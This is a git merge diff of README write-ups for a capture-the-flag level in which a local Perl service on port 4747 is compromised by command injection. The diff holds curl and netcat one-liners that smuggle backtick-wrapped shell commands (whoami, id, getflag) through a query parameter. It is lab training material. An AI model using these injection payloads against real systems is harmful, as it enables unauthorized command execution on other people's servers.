Merge branch 'main' of https://github.com/nuoxoxo/cfo into main

README.mdx

@@ -359,12 +359,13 @@ Solution
 - set the query payload and Perl will echo it 
 
 ```b
+> curl -I localhost:4747
+or
 > nc -vz localhost 4747
       ^ v: verbose
         z: scan if a port is open (a listening daemon)
 Connection to localhost 4747 port [tcp/*] succeeded!
 
-
 # eg.
 > curl localhost:4747/?x="\`/usr/bin/whoami\`" 
 > curl localhost:4747/?x="\`/usr/bin/id\`" 
@@ -373,14 +374,15 @@ Connection to localhost 4747 port [tcp/*] succeeded!
 > curl localhost:4747/?x="\`/bin/df\`" 
 
 
-# avoid typing realpath out
+# whereis or which : avoid typing realpath out
 > curl localhost:4747/?x="\`$(whereis pwd|awk '{print $2}')\`"
-or
 > curl localhost:4747/?x="\`$(which pwd)\`" 🟢 
 
 
 # solve
 > curl localhost:4747/?x="\`$(which getflag)\`"
+or
+> echo -e "GET /?x=\`$(which getflag)\` HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 4747
 ```
 
 

level04/README.mdx

@@ -41,12 +41,13 @@ Solution
 - set the query payload and Perl will echo it 
 
 ```b
+> curl -I localhost:4747
+or
 > nc -vz localhost 4747
       ^ v: verbose
         z: scan if a port is open (a listening daemon)
 Connection to localhost 4747 port [tcp/*] succeeded!
 
-
 # eg.
 > curl localhost:4747/?x="\`/usr/bin/whoami\`" 
 > curl localhost:4747/?x="\`/usr/bin/id\`" 
@@ -55,12 +56,13 @@ Connection to localhost 4747 port [tcp/*] succeeded!
 > curl localhost:4747/?x="\`/bin/df\`" 
 
 
-# avoid typing realpath out
+# whereis or which : avoid typing realpath out
 > curl localhost:4747/?x="\`$(whereis pwd|awk '{print $2}')\`"
-or
 > curl localhost:4747/?x="\`$(which pwd)\`" 🟢 
 
 
 # solve
 > curl localhost:4747/?x="\`$(which getflag)\`"
+or
+> echo -e "GET /?x=\`$(which getflag)\` HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 4747
 ```